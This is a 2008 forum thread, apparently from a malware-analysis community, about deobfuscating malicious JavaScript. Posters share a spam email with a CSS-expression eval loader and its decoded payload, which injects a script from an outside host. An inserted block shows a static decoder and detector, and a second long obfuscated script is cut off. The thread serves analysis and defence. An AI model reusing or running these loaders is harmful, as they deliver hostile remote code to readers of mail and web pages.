Author Topic: Haven't seen this one before  (Read 31046 times)


September 29, 2008, 05:47:35 pm
Reply #15

bobby

Will be decoded by the next version of Malzilla :)
I think I know how I can process it.
The sub-project name is "Kalimero processor". As for now, it gets all the relevant HTML-part data. It remains now to implement passing the data to the JS engine.
Because of urgency, Kalimero will probably create a template from the HTML, the same kind of template we already have in the Decoder tab, and Decoder will use it like any other template. This is probably the fastest way to get deobfuscation of this kind of script implemented.

October 07, 2008, 08:23:38 pm
Reply #16

lance

How did you manage to decode it? I've tried several ways, but have absolutely no idea  :(

October 07, 2008, 08:47:21 pm
Reply #17

bobby

No, it can't be decoded because it contains bugs, but at least we know which kind of scripts we can expect in the future.

October 16, 2008, 05:40:52 pm
Reply #18

SysAdMini

Ruining the bad guy's day

October 16, 2008, 06:00:52 pm
Reply #19

bobby

Forgot to mention that Malzilla now does deobfuscate all the scripts mentioned in this topic.
Credit goes to antnet, who implemented the DOM objects needed for deobfuscating this kind of script.

October 18, 2008, 12:02:32 pm
Reply #20

philipp

Hi,
I got an email with an interesting (obfuscated) JavaScript using HTML elements.
Unfortunately I can't install Malzilla, so I thought I'll post the source here for you to check if Malzilla is able to decode this one as well  :)

Code:
Return-Path: <akstcstatepipemnsdgs@statepipe.com>
X-Original-To: postmaster@xxx.de
Delivered-To: postmaster@xxx.de
Received: from dimash-58419dbd (unknown [89.218.245.253])
by family.xxx.de (Postfix) with ESMTP id 24790361B668
for <postmaster@xxx.de>; Sat, 18 Oct 2008 11:20:47 +0200 (CEST)
Received: from [89.218.245.253] by mail-fwd.mx.g19.rapidsite.net; Sat, 18 Oct 2008 15:20:47 +0600
Message-ID: <01c93135$18733180$fdf5da59@akstcstatepipemnsdgs>
From: "Liz Haskins" <akstcstatepipemnsdgs@statepipe.com>
To: <postmaster@xxx.de>
Subject: zzbrq
Date: Sat, 18 Oct 2008 15:20:47 +0600
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0007_01C93135.18733180"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4927.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4927.1200
X-DSPAM-Result: Spam
X-DSPAM-Processed: Sat Oct 18 11:20:48 2008
X-DSPAM-Confidence: 0.8483
X-DSPAM-Probability: 1.0000
X-DSPAM-Signature: 48f9aa7075265120455541

This is a multi-part message in MIME format.

------=_NextPart_000_0007_01C93135.18733180
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

http://thankfun.com
lzzhm bnmr, hctm od.

------=_NextPart_000_0007_01C93135.18733180
Content-Type: text/html;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Dus-ascii"=
>
<META content=3D"MSHTML 5.50.4927.1200" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY>

<DIV STYLE=3Dexp/*<A STYLE=3D'N\xsc:PmB("*//*");&#101;x&#x2F;*g*//*/*/pre=
ssion(top["ev"&#43"al"](unescape(document.getElementById("seNYKvlG").inne=
rHTML.replace(/[^\d%a-fA-F]+/g,""))))'>>zp63nJ</DIV>
<DIV id=3D"seNYKvlG">%j2O0%P73H%n6s5t%J7K4X%R4y9q%w6jE%g7H4T%L6Z5y%i7y2o%=
n7m6s%X6X1,%z6wCN%m2s8H%h2l2V%g7V7y%q6G9J%w6tEj%i6U4M%o6PFX%j7m7s%n2iEY%s=
7v3o%l7x4n%M6.1Z%q7U4I%M7s5L%h7l3p%H2l0j%Y3IDW%H2h0,%l2l7n%Q4KFR%y7s0h%P6=
z5

%q6mE(%G6x9V%Y6MEm%Q6o7T%P2Z0Y%I7O0Z%.6X1)%O6H7H%T6r5O%p2z0I%Q2o2z%S2nBk%=
R6O4J%u6mFS%n6.3x%r7W5j%k6xDR%M6m5(%s6VEw%T7h4P%t2LEH%z6iC.%z6KFj%q6I3y%U=
6M1S%P7,4N%O6X9t%P6tFh%T6PEH%N2.Bv%S2q2p%K2MEl%Z2iEL%p2

EN%U2X7T%v2k2u%j2uCn%W3I1p%V3W0w%W3O0u%T2p9X%H3ZBg%K6Y4N%k6oFW%m6n3W%q7X5=
n%y6xDX%H6p5,%)6.Eu%J7m4V%s2OEq%l6H3z%g6QFJ%S6kFW%w6oBK%i6t9V%M6L5x%v3MDx=
%X2j2.%K7k2m%)7Y5J%U6XEH%r5mFz%y6z6i%l7P2)%o6SFq%t6nDS%

5wFU%x6XDJ%U6r1M%x6P9l%r6WCY%h3nDK%i2N2G%.2gBU%P6N5w%o7k3k%u6H3)%q6z1w%U7=
P0T%p6X5P%x2,8P%p2V2W%I3Z0I%h7,8N%I6V6Y%)6m6J%.6.6g%o6U6p%)6K1.%M3j0y%T3J=
9G%.3.1O%Y3n2w%g6K2g%w2U2X%,2l9v%g3wBS%i6V9Q%r6q6t%R2m8

%h6H4Z%K6qFV%q6X3N%q7t5z%y6HDr%U6x5J%W6gEu%j7q4n%U2HEv%q6z7u%t6x5L%Z7O4W%=
S4y5Z%q6rCS%o6W5I%V6UDX%P6r5O%Y6lEP%V7w4(%z4U2X%T7X9)%w4Y9t%l6p4j%Y2h8X%V=
2Y2Z%k7QBz%g5kFq%z4g4M%j4Y9x%t5n6m%n5s3U%x5,4)%q4LFV%o5

0.%.7ODW%k2s2(%v2K9Q%Z2GEO%i6n9o%O6uEH%n6iE)%U6T5z%M7z2I%V4S8Q%p5r4Q%N4WD=
o%g4MCn%y2n1s%U3HDN%Y2p2p%P3p1n%.2Q2z%i2h9Z%M7LBL%J6k4M%l6)FQ%T6,3x%p7P5h=
%L6tDN%i6n5G%W6iEj%S7Y4p%r2iEV%S7Q7V%I7X2t%R6(9n%q7,4p%

6l5N%s2Y8h%N2g2W%Q3hCN%g6(8V%y7r4w%S6ODU%Z6oCU%v3IE)%k3kCo%g6y8t%X6l5X%Z6=
1R%o6H4N%Y3uEk%)3wCR%u2IFy%K6H8V%u6K5H%P6R1(%m6w4,%n3qEG%N3YCu%u6y2i%S6L=
FX%J6q4M%y7.9R%y3.Et%p2J2g%x2JBQ%G2x2Z%i4QCU%Y6mFi%o6j1

%M6O4,%n6W9L%l6XEn%k6n7K%H2R0O%t6xDl%X6X5n%o7l3P%R7w3Z%W6)1g%T6L7h%h6,5t%=
t2r0g%x6R2s%H6)FU%u6.4l%P7L9T%r2qCk%j2w0O%R7W0t%R6uC.%r6k5p%p6T1p%z7(3q%G=
6J5S%X2z0q%O7v7U%o6P1z%U6q9m%u7I4O%t2tE)%w2tEL%n2yE.%r3

CM%I6o2t%H7V2.%p3ZEG%)2o2)%Q2uBo%r2s2T%v3UCW%t4V9k%x4nDg%X4L7T%h2P0T%R7.3=
h%x7L2R%.6n3q%(3IDS%R2u7O%t6z8u%s7X4p%T7j4k%)7Q0q%W7n3s%v3(AX%,2zF.%k2MFv=
%W7S6q%)6K5w%U7p2x%x6h9h%p6z6S%q6L9L%z6M5x%,6R4Q%R2sEM%

7z6Q%l6T9v%U7X3h%l6N1(%x2pEt%r6q3j%G6IF)%i6HDP%t2nFq%L6N1u%p6,1R%M6RDM%P2=
LFl%p6T9z%I6xDn%w6g1k%(6t7V%(6R5Y%r7q3T%h2HFN%S7Q0v%u7Z2O%O6kFk%u6T3R%O6G=
5U%X7J3W%i7P3h%V6(9t%N6gEM%J6u7x%z2wEY%L6N7S%S6K9q%z6Y6

%h2L7R%g3qEv%S3gCK%.6i2l%)7Q2n%S3IEN%.2m2,%P2HBV%y2l2)%S3mCH%x7p3)%s6Y3h%=
h7H2Z%o6G9U%L7H0z%Q7n4(%)2Q0N%M7l3)%W7I2Z%K6u3X%L3jDu%v5oCY%V2.2Q%H6J8(%p=
7R4I%V7S4g%.7U0J%k3wAs%g2UFv%U2)FQ%X6N2G%Y2vEU%v6SEU%L6

AX%v6KEq%j6oBg%Q2vEm%V6wEI%V6k5q%z7w4Y%T2nFK%K6u3X%r6W7g%w6y9X%T2ZDs%W6q2=
Z%q6J9g%y6HEX%L2zFg%Q6)1u%Z6.4O%G7s6S%y6h5j%o7y2l%R7K4X%X2nE.%h7H0j%Y6MCK=
%x5VCK%P2l2t%h3xEr%S3lCH%v2UFQ%U7O3H%p6)3O%J7M2i%G6L9x%

7j0U%m7o4J%I3IEy%(2k2X%Z2UBs%J2w2h%)3sCj%W2NFw%n6u2O%)6iFM%I6Q4.%x7x9p%)3=
Ez%K3xCN%y2(Fu%O6x8x%N7K4n%(6UDs%P6LCj%o3vEm%O2H2X%R2o9X%r3WBT%x6X4L%r6w=
FL%H6j3M%Y7m5G%L6vD.%R6o5T%P6vEK%j7W4T%Z2YEO%r6W7)%O6v5

%U7I4s%H4x5V%y6sCL%t6)5Q%k6tDL%p6,5n%O6PET%v7U4m%i4k2N%g7v9q%o4h9Z%k6r4i%=
(2y8S%L2X2X%p7PBJ%.5ZFm%o4J4K%v4M9Q%W5P6j%Q5(3y%i5s4N%Y4IFO%R5i0O%x7nDw%H=
2r2Y%S2X9p%p2NEK%P6x9J%I6wEp%H6NE(%I6(5m%q7M2G%n4y8W%v5

4M%G4tDH%P4pCn%u3(DU%M2Q2L%R3.1O%(2V2g%y3NBw%.7UDX%)2O0u</DIV>

</BODY></HTML>

------=_NextPart_000_0007_01C93135.18733180--


decodes to:
Code:
setInterval("window.status = 'Opening page "+document.location+"...'",100);document.cookie="run_from_mail="+escape("0xffffa0912b");if(document.getElementById("{_DIVSTOP}").innerHTML!="1"){document.write("<html><head></head><body>"+"Loading message body, please wait...<br>"+"<IMG src='https://verified.visa.com/aam/images/processing.gif'><br>"+"<script src=\"http://b.njnk.net/cgi-bin/advert.pl\"></script>"+"</body></html>");document.getElementById("{_DIVSTOP}").innerHTML="1";}

regards,
philipp
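The loader in philipp's sample never carries the payload in the script itself: the script's STYLE attribute reads the carrier DIV's innerHTML, strips every character that is not a digit, `%` or a hex letter, and feeds the remaining `%XX` escapes to unescape() before eval(). The same two transformations can be replayed offline to read the payload without executing it. The code below is an added example, not code from the post and not Malzilla's own decoder; all function names, the `carrier` id and the sample HTML fragment are constructed for the demonstration. It also shows the detection side: the sample spells the CSS keyword as `&#101;x&#x2F;*g*//*/*/pression(` (numeric entities plus CSS comments), so a STYLE value has to be entity-decoded and comment-stripped before a keyword match is meaningful.

```javascript
// Added example (not from the forum post, not Malzilla code): static decoding
// of the "HTML element + CSS expression" loader, plus a normaliser for the
// obfuscated STYLE keyword. The mail body is quoted-printable, so that is the
// first layer to remove.

// Step 0: quoted-printable. "=\n" is a soft line break, "=XX" a hex byte.
function decodeQuotedPrintable(s) {
  return s
    .replace(/=\r?\n/g, '')
    .replace(/=([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Step 1: pull the text of the carrier <DIV id="..."> out of the raw HTML.
// A small regex is enough for a single-DIV carrier; it is not an HTML parser,
// and `id` is assumed to be a plain identifier (no regex metacharacters).
function extractDivById(html, id) {
  const re = new RegExp('<div[^>]*\\bid=["\']?' + id + '["\']?[^>]*>([\\s\\S]*?)</div>', 'i');
  const m = re.exec(html);
  return m ? m[1] : null;
}

// Step 2: exactly the loader's own transformation, minus the eval().
// The junk characters are always outside [0-9 % a-f A-F], so the strip is lossless.
function decodeJunkPaddedEscapes(text) {
  const cleaned = text.replace(/[^\d%a-fA-F]+/g, '');
  return unescape(cleaned);
}

// Whole pipeline: QP-decoded HTML part -> carrier DIV -> decoded payload string.
function recoverPayload(qpHtmlPart, divId) {
  const html = decodeQuotedPrintable(qpHtmlPart);
  const carrier = extractDivById(html, divId);
  return carrier === null ? null : decodeJunkPaddedEscapes(carrier);
}

// Detection side. Decode &#NNN; / &#xHH; (semicolon optional, as in the sample),
// drop /* ... */ comments, then look for the expression( keyword.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|\d+);?/gi, (_, code) =>
    String.fromCharCode(code[0].toLowerCase() === 'x'
      ? parseInt(code.slice(1), 16)
      : parseInt(code, 10)));
}

function looksLikeCssExpression(styleValue) {
  const normalised = decodeNumericEntities(styleValue).replace(/\/\*[\s\S]*?\*\//g, '');
  return /expression\s*\(/i.test(normalised);
}

// Constructed sample (not the mail's carrier): junk-padded escapes for "hello",
// with a quoted-printable soft line break in the middle and id=3D for id=.
const SAMPLE_HTML_PART = '<DIV id=3D"carrier">%h6X8%Q6Z5%w6Ncq=\n%x6.cZ%R6Tfp</DIV>';

console.log(recoverPayload(SAMPLE_HTML_PART, 'carrier'));                 // hello
console.log(looksLikeCssExpression('&#101;x&#x2F;*g*//*/*/pression(1)')); // true
```

The decoded string is printed, never evaluated; for a real sample the next step is to read it (as philipp did above) rather than run it. The keyword normaliser is a heuristic: it mirrors the entity and comment tricks visible in this sample, and browser-specific parsing of unquoted STYLE attributes can differ from it.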

January 26, 2009, 05:51:59 pm
Reply #21

SysAdMini

Code:
<body><script>A='';I='123456789+/=";function ';O='return ci}CCJ="ABCDEFGH';S='hexToString(d){a="";';V='="";for(i=0;i<b;i++){';H='b=b*64+CCJ.indexOf(d.';U='function HDV(a,b){ci';N='+=a.substring(d,d+1)}';Z='var d=Math.floor(M';J='efghijklmnopqrstuvwxyz0';R='1?64:c/4);if(c!=64){';Q='charAt(i));c=(c==';C='IJKLMNOPQRSTUVWXYZabcd';P='harAt(i)=="\\n") break;';W='0;i<d.length;i++){';Y='ath.random()*a.length);ci';M='if(d.charAt(i)=="="||d.c';T='b=0;c=1;for(i=';A+=U+V+Z+Y+N+O+C+J+I+S+T+W+M+P+H+Q+R;U='=s[i];s[i]=s[j];';S='b.length;y++){i=(i+1';M='k+=a;a=k;for(i=oil;i<25';H='return a}oil=0;fu';G='nction OSZ(a,b){';K=';c="";for(y=0;y<';Z=';for(i=oil;i<256;i++';X='arCode(parseInt(b/c));';Q='s[j]=x}i=oil;j=oil';J='oil;oil=0}s=new Array();';P='){j=(j+s[i]+a.charCod';C=')%256;j=(j+s[i])%256;';V='b%=c}}';O='a+=String.fromCh';F='6;i++)s[i]=i;j=oil';I='k="";if(isNaN(oil)){k=';E='eAt(i%a.length))%256;x';A+=O+X+V+H+G+I+J+M+F+Z+P+E+U+Q+K+S+C;V='x=s[i];s[i]=s[';C='c}function rc4Decrypt(';F='rCodeAt(y)^s[(s[i]+s[j';B='(a,256);else this.XEL';T='n new A(null)}function ';N='tring.fromCharCode(b.cha';X='j];s[j]=x;c+=S';L='(a,b)}function nbi(){retur';G='}VLG=((0xdeadbeef';D=';else if(b==null&&"str';O='e);function A(a,b,c){i';Y='a,b){return OSZ(a,b)';E='ing"!=typeof a)this.XEL';H='f(a!=null)if("number"==type';S='cafe&0xffffff)==0xefcaf';Z='])%256])}return ';J='of a)this.fromNumber(a,b,c)';A+=V+X+N+F+Z+C+Y+G+S+O+H+J+D+E+B+L+T;D='[j++]=v&0x3ffffff}return c';Q='c,n){var a=x&0x3fff,xh=x>>14';G=';while(--n>=0){var l=this[i';H='l+((m&0x7fff)<<15)+w[j]+(';Y='+c;c=Math.floor(v/0x4000000);w';Z=' c}function QZY(i,x,w,j,';X='=0){var v=x*this[i++]+w[j]';W='STI(i,x,w,j,c,n){while(--n>';V=']&0x3fff;var h=this[i++]>';J='c&0x3fffffff);c=(l>>>30)+';L=',xh=x>>15;while(--n>=0){var l=';R='j,c,n){var a=x&0x7fff';M='s[i++]>>15;var m=xh*l+h*a;l=a*';C='=l&0x3fffffff}return';T='(m>>>15)+xh*h+(c>>>30);w[j++]';O='}function PFI(i,x,w,';S='this[i]&0x7fff;var 
h=thi';A+=W+X+Y+D+O+R+L+S+M+H+J+T+C+Z+Q+G+V;X='am=QZY;B=28}A.prototype.DB=B;';B='>14;var m=xh*l+h*a;l=a';S='otype.am=PFI;B=30}else if(VL';E='4)+xh*h;w[j++]=l&0xfffffff}re';Y='j]+c;c=(l>>28)+(m>>1';U='pe")){A.prototype.am=ST';G='BI_FP=52;A.prototype.FV=Math.';N='I;B=26}else{A.prototype.';W='turn c}if(VLG&&(navig';R='pow(2,BI_FP);A.prototype.F1=';K='G&&(navigator.appName!="Netsca';H='ototype.DV=(1<<B);var ';Q='*l+((m&0x3fff)<<14)+w[';C='A.prototype.DM=((1<<B)-1);A.pr';L='BI_FP-B;A.prototype.F2=2*B-';T='ator.appName=="Microsoft ';M='Internet Explorer")){A.prot';A+=B+Q+Y+E+W+T+M+S+K+U+N+X+C+H+G+R+L;S=';var rr,vv;rr="0".charCodeAt';Y='{return JCN.charAt(n';F='BI_FP;var JCN="0123456789abcde';N='=null)?-1:c}function NTY(r){fo';I='=vv;rr="A".charCodeAt(0);f';E='or(vv=10;vv<36;++vv)';X=')}function EUH(s,i){var c=L';M='arCodeAt(0);for(vv=10';T='(0);for(vv=0;vv<=9;++vv';D='VT[s.charCodeAt(i)];return(c=';H=';vv<36;++vv)LVT[rr++]';Z=')LVT[rr++]=vv;rr="a".ch';P='r(var i=this.t-1;i>=0;--i)r[';G='fghijklmnopqrstuvwxyz"';L=';var LVT=new Array()';U='i]=this[i];r.t=this.t;r.s=th';R='LVT[rr++]=vv;function SBG(n)';A+=F+G+L+S+T+Z+M+H+I+E+R+Y+X+D+N+P+U;W='x>0)this[0]=x;else if(x<-';Q='==2)k=1;else if(b==32';J='8)?s[i]&0xff:EUH(s,i);';P='if(x<0){if(s.charAt(i)=';K='urn}this.t=0;this.s=0;va';F='ar r=nbi();r.EZD(i);return r}f';H='is.t=1;this.s=(x<0)?-1:0;if(';U='is.s}function CTR(x){th';O=')k=5;else if(b==4)k=2;else{th';D='(b==16)k=4;else if(b==8)k=3;el';M=';while(--i>=0){var x=(k==';Z='is.t=0}function nbv(i){v';L='1)this[0]=x+DV;else th';E='se if(b==256)k=8;else if(b';S='is.fromRadix(s,b);ret';R='r i=s.length,mi=false,sh=0';X='unction JGU(s,b){var k;if';A+=U+H+W+L+Z+F+X+D+E+Q+O+S+K+R+M+J+P;F='x&((1<<(this.DB-sh))';M='DB-sh))-1)<<sh}this.QSG();if';P=']=x;else if(sh+k>thi';C='(this.DB-sh))}else 
this[t';E='(k==8&&(s[0]&0x80)!=0){th';Y='his.t-1]|=x<<sh;sh+=k;';W='is.s=-1;if(sh>0)this[th';K='s.DB){this[this.t-1]|=(';T='this.s&this.DM;while';L='se;if(sh==0)this[this.t++';N='(this.t>0&&this[this.';R='-1))<<sh;this[this.t++]=(x>>';J=')}function FJH(){var c=';B='="-")mi=true;continue}mi=fal';Z='if(sh>=this.DB)sh-=this.DB}if';U='is.t-1]|=((1<<(this.';G='(mi)A.ZNP.IXQ(this,this';A+=B+L+P+K+F+R+C+Y+Z+E+W+U+M+G+J+T+N;M='==8)k=3;else if(b==2';F='t-1]==c)--this.t}function LCD(';B='0){m=true;r=SBG(d)}while(i>=';P='=this.t;var p=this.DB-(i';S='"+this.UHO().CPD(b);var ';V='ar a=(1<<k)-1,d,m=false,r="",i';J='eturn this.toRadix(b);v';G='=5;else if(b==4)k=2;else r';U=')k=1;else if(b==32)k';Q='-i]>>(p+=this.DB-k)}el';D='0){if(p<k){d=(this[i]&((1<<p)-';C='k;if(b==16)k=4;else if(b';H='se{d=(this[i]>>(p-=k';X='1))<<(k-p);d|=this[-';K='*this.DB)%k;if(i-->0){i';Y='b){if(this.s<0)return"-';W='f(p<this.DB&&(d=this[i]>>p)>';A+=F+Y+S+C+M+U+G+J+V+P+K+W+B+D+X+Q+H;S='r}function BEQ(){return(th';I='+=8}if((t=x>>4)!=0){x=t';R='is.s<0)?this.UHO():this}f';J='t;if((t=x>>>16)!=0){x=t;r+=16}';E='))&a;if(p<=0){p+=this';W='i();A.ZNP.IXQ(this,r);return ';Z='0}function LVW(x){var r=1,';G='0"}function WVI(){var r=nb';V='s.t;r=i-a.t;if(r!=0)return';T=']-a[i])!=0)return r;return ';H=';r+=4}if((t=x>>2)!=0){x';F='unction ZDV(a){var r=this.s-a.';P=' r;while(--i>=0)if((r=this[i';D='if((t=x>>8)!=0){x=t;r';O='.DB;--i}}if(d>0)m=true;if(m)r+';Y='=SBG(d)}}return m?r:"';X='s;if(r!=0)return r;var i=thi';A+=E+O+Y+G+W+S+R+F+X+V+P+T+Z+J+D+I+H;B='];for(i=n-1;i>=0;--i)r[';X='s=this.s}function WND(n,r';R='eturn this.DB*(this.t-1)+LV';S='{if(this.t<=0)return 0;r';K='i-n]=this[i];r.t=Math.max(thi';O='=1}return r}function QYQ()';M='is.s&this.DM))}function XLJ(n,';W='s.t-n,0);r.s=this.s}function';G='=t;r+=2}if((t=x>>1)!=0){x=t;r+';C='1;var e=Math.floor(n/t';Z='b=this.DB-a;var d=(1<<b)-';N=' NVJ(n,r){var a=n%this.DB;var ';P='r){var i;for(i=this.t-1;';T='){for(var 
i=n;i<this.t;++i)r[';I='W(this[this.t-1]^(th';H='i>=0;--i)r[i+n]=this[i';V='i]=0;r.t=this.t+n;r.';A+=G+O+S+R+I+M+P+H+B+V+X+T+K+W+N+Z+C;W='or(n/this.DB);if(a>=this.t';F='r[i]=0;r[e]=c;r.t=this.t';O='his.DB),c=(this.s<<a';X='){r.t=0;return}var b';N='t;++i){r[i-a-1]|=(this[i]&d)<<';T='c;r[i-a]=this[i]>>b}if(b>0)r[t';K='=n%this.DB;var c=this.DB-b;';M='is[a]>>b;for(var i=a+1;i<this.';Q='+e+1;r.s=this.s;r.QS';C='i]&d)<<a}for(i=e-1;i>=0;--i)';L='r.s=this.s;var a=Math.flo';B='var d=(1<<b)-1;r[0]=th';D='G()}function IBR(n,r){';Y='-1;i>=0;--i){r[i+e+1';P=']=(this[i]>>b)|c;c=(this[';R='his.t-a-1]|=(this.s&d)<<c;r';Z=')&this.DM,i;for(i=this.t';A+=O+Z+Y+P+C+F+Q+D+L+W+X+K+B+M+N+T+R;L='ath.min(a.t,this.t);while(i<';F='if(c>0)r[i++]=c;r.t=i;r.';P='s}else{c+=this.s;whi';V='.t=this.t-a;r.QSG()}funct';N='m){c+=this[i]-a[i];r[i++]=c&';D='this.DM;c>>=this.DB}if(a';U=')r[i++]=this.DV+c;else ';Q='r){var x=this.abs(),y=a.abs';X='ion PMT(a,r){var i=0,c=0,m=M';H='le(i<a.t){c-=a[i];r[i++]=c&th';E='.DM;c>>=this.DB}c+=this.';R='a.s}r.s=(c<0)?-1:0;if(c<-1';O='QSG()}function RIP(a,';K='();var i=x.t;r.t=i+y.t;whi';J='.t<this.t){c-=a.s;while(i<this';Z='.t){c+=this[i];r[i++]=c&this';W='is.DM;c>>=this.DB}c-=';A+=V+X+L+N+D+J+Z+E+P+H+W+R+U+F+O+Q+K;U='*x[i],r,2*i+1,c,x.t-i';Q='nction QJV(m,q,r){var a=m';G='.DV;r[i+x.t+1]=1}}if(r.t';L='.abs();if(a.t<=0)return;';W='i=0;i<y.t;++i)r[i+x.t]=x.';Z='-1))>=x.DV){r[i+x.t]-=x';E='if((r[i+x.t]+=x.am(i+1,2';H='le(--i>=0)r[i]=0;for(';P='am(0,y[i],r,i,0,x.t);r.s=0;';Y='=r.t=2*x.t;while(--i>=0)r';M='[i]=0;for(i=0;i<x.t-1;++i){va';K='>0)r[r.t-1]+=x.am(i,x[i]';V=',r,2*i,0,1);r.s=0;r.QSG()}fu';N='.s)A.ZNP.IXQ(r,r)}function Z';I='r c=x.am(i,x[i],r,2*i,0,1);';J='JT(r){var x=this.abs();var i';D='r.QSG();if(this.s!=a';A+=H+W+P+D+N+J+Y+M+I+E+U+Z+G+K+V+Q+L;U='(r)}var d=y.t;var f=y[d-1];i';D=')>=0){r[r.t++]=1;r.IXQ(t,';V='.DB-LVW(a[a.t-1]);if';Q='r==null)r=nbi();var y=nbi()';W='var b=this.abs();if(b.t<a.';N='s.F1)+((d>1)?y[d-2]>>this';J='null)this.GLM(r);return}if(';T='ar 
i=r.t,j=i-d,t=(q==null)?';H='(c>0){a.OGH(c,y);b.OGH';M='f(f==0)return;var g=f*(1<<thi';Z='=(1<<this.F1)/g,e=1<<this.F2;v';E='(c,r)}else{a.GLM(y);b.GLM';X='t){if(q!=null)q.EZD(0);if(r!=';I=',ts=this.s,ms=m.s;var c=this';G='.F2:0);var h=this.FV/g,d2';O='r)}A.ONE.YKT(d,t);t.IXQ(y,y';R='nbi():q;y.YKT(j,t);if(r.RVT(t';A+=W+X+J+Q+I+V+H+E+U+M+N+G+Z+T+R+D+O;D='(a){var r=nbi();this.ab';R='[i]+=y.am(0,k,r,j,0,d))';V='{this.m=m}function GEM(x){if';E='&&r.RVT(A.ZNP)>0)a.IXQ(r,r);';S='(--j>=0){var k=(r[--i]==f)?t';M=');while(y.t<d)y[y.t++]=0;while';H='.UVV(c,r);if(ts<0)A.ZNP.';X='return r}function XHZ(m)';P='le(r[i]<--k)r.IXQ(t,r)}';J='his.DM:Math.floor(r[i]';Y='}if(q!=null){r.SLX(d,';C='s().IDW(a,null,r);if(this.s<0';Z='q);if(ts!=ms)A.ZNP.IXQ(q';F=',q)}r.t=d;r.QSG();if(c>0)r';L='IXQ(r,r)}function HKP';U='*h+(r[i-1]+e)*d2);if((r';B='<k){y.YKT(j,t);r.IXQ(t,r);whi';A+=M+S+J+U+R+B+P+Y+Z+F+H+L+D+C+E+X+V;Z=' QEM(){if(this.t<1)ret';N=')==0)return 0;var y=x&3;y';G='n QYJ(x){x.IDW(this.m,null,';B='){x.WZX(r);this.FIS(r)}';I='n IQI(x){return x}functio';C='prototype.FIS=QYJ;XHZ';T='else return x}functio';P='M;XHZ.prototype.OQU=IQI;XHZ.';V='XHZ.prototype.PIX=GE';K='(x.s<0||x.RVT(this.m';D=')>=0)return x.mod(this.m);';E='r){x.STM(y,r);this.F';R='urn 0;var x=this[0];if((x&1';M='x)}function INU(x,y,';O='.prototype.OVI=INU;XHZ';J='IS(r)}function BFD(x,r';Y='.prototype.SNT=BFD;function';A+=K+D+T+I+G+M+E+J+B+V+P+C+O+Y+Z+R+N;C='function JTU(m){this.m=m;';I='this.mp=m.LBB();this.mp';G='y=(y*(2-(((x&0xffff)*y)&';W='turn(y>0)?this.DV-y:-y}';P='*y%this.DV))%this.DV;re';T='P)>0)this.m.IXQ(r,r);r';J='r);if(x.s<0&&r.RVT(A.ZN';Y='*(2-(x&0xff)*y))&0xff;';L='eturn r}function ULW(x){';S='0xffff)))&0xffff;y=(y*(2-x';Q='=nbi();x.abs().YKT(this.m.t';B='.DB-15))-1;this.mt2=2*';D='=(y*(2-(x&0xf)*y))&0xf;y=(y';V='=this.mp>>15;this.um=(1<<(m';F='m.t}function FFN(x){var r';E='l=this.mp&0x7fff;this.mph';Z=',r);r.IDW(this.m,null,';A+=D+Y+G+S+P+W+C+I+E+V+B+F+Q+Z+J+T+L;K='on VWX(x,y,r){x.STM(';G='var 
r=nbi();x.GLM(r);this.FIS';W=',x)}function JOH(x,r){x.';I='is.m.am(0,a,x,i,0,this.m.t);wh';S='V;x[++j]++}}x.QSG();x.S';R='M;j=i+this.m.t;x[j]+=th';T=';++i){var j=x[i]&0x7fff';D=';var a=(j*this.mpl+(((j*t';O='(r);return r}function KJE(x)';Z='VT(this.m)>=0)x.IXQ(this.m';Y='s.mpl)&this.um)<<15))&x.D';V='ile(x[j]>=x.DV){x[j]-=x.D';C='LX(this.m.t,x);if(x.R';L='his.mph+(x[i]>>15)*thi';F='=0;for(var i=0;i<this.m.t';X='WZX(r);this.FIS(r)}functi';B='{while(x.t<=this.mt2)x[x.t++]';A+=G+O+B+F+T+D+L+Y+R+I+V+S+C+Z+W+X+K;M='IX(this),i=LVW(e)-1;g.GLM(r)';S='VI=VWX;JTU.prototype.S';H='I(r2,g,r);else{var t=r;';D='r=r2;r2=t}}return z.OQU(r';R='this.s)==0}function MUJ';C='2);if((e&(1<<i))>0)z.OV';K='otype.FIS=KJE;JTU.prototype.O';E='n((this.t>0)?(this[0]&1):';Z='NT=JOH;function ENV(){retur';B='f||e<1)return A.ONE;v';Y='otype.PIX=FFN;JTU.pro';U='ar r=nbi(),r2=nbi(),g=z.P';G='totype.OQU=ULW;JTU.prot';P='(e,z){if(e>0xfffffff';W=';while(--i>=0){z.SNT(r,r';T=')}function LTQ(e,m){var z;if(';V='y,r);this.FIS(r)}JTU.prot';A+=V+Y+G+K+S+Z+E+R+P+B+U+M+W+C+H+D+T;V='rototype.UHO=WVI;A.prot';H='pe.EZD=CTR;A.prototype.XEL';N='ototype.IDW=QJV;A.pro';W='rototype.STM=RIP;A.p';F='rototype.CPD=LCD;A.p';U='totype.LBB=QEM;A.prototype.VQT';T=');return this.exp(e,z)}';B='=ENV;A.prototype.exp=MUJ;A.p';P='V=IBR;A.prototype.IXQ=PMT;A.p';Q='A.prototype.GLM=NTY;A.prototy';I='=JGU;A.prototype.QSG=F';Z='type.OGH=NVJ;A.prototype.UV';D='e<256||m.VQT())z=new X';S='ototype.SLX=WND;A.proto';M='HZ(m);else z=new JTU(m';J='rototype.WZX=ZJT;A.pr';X='JH;A.prototype.YKT=XLJ;A.pr';A+=D+M+T+Q+H+I+X+S+Z+P+W+J+N+U+B+F+V;N='otype.abs=BEQ;A.prototy';X='=this.S[j];this.S[j]=t}this.i=';U='pe.YPP=QYQ;A.prototype.mod=HKP';Z='pe.RVT=ZDV;A.prototy';C='=0;for(i=0;i<256;++i){j=(j+thi';Q='55;t=this.S[i];this.S[i]';H='.S[this.i])&255;t=this.S[this';F='s.S[i]+a[i%a.length])&2';Y='s.S=new Array()}funct';J='nbv(0);A.ONE=nbv(1);function H';W='TL(){var t;this.i=(thi';D='0;this.j=0}function V';G='ion KLR(a){var 
